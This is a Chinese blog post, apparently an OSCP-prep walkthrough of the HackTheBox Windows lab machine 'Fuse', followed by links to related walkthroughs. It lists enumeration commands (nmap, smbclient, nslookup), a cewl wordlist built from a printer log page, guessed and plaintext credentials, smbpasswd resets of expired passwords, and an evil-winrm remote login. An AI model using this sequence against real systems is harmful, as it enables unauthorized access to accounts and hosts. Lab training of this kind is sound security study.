EthanDoctor

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

Ethan医生2个月前靶场93

fuse

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)

image.png

nslookup fabricorp.local  10.129.2.5

image.png

image.png


smbclient -L //10.129.2.5/ -N  

image.png


http://fuse.fabricorp.local/papercut/logs/html/index.htm

image.png

cewl -d 5 -m 3 -w password.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers



smbclient -L //10.129.2.5 -U tlavel%Fabricorp01

image.png



错误:Cannot connect to server. Error was NT_STATUS_PASSWORD_MUST_CHANGE
需要用smbpasswd修改密码


sudo smbpasswd -r 10.129.235.28 -U tlavel

smbpasswd -r 10.129.235.28 bhult

更新密码后直接登入然后提权


evil-winrm -i 10.129.235.28 -u svc-print -p '$fab@s3Rv1ce$1'

image.png


标签: OSCP
返回列表

上一篇:OSCP备考_0x54_HackThBox靶机_Windows_remote

下一篇:OSCP备考_0x56_HackThBox靶机_Windows_worker

相关文章

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-31,332/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号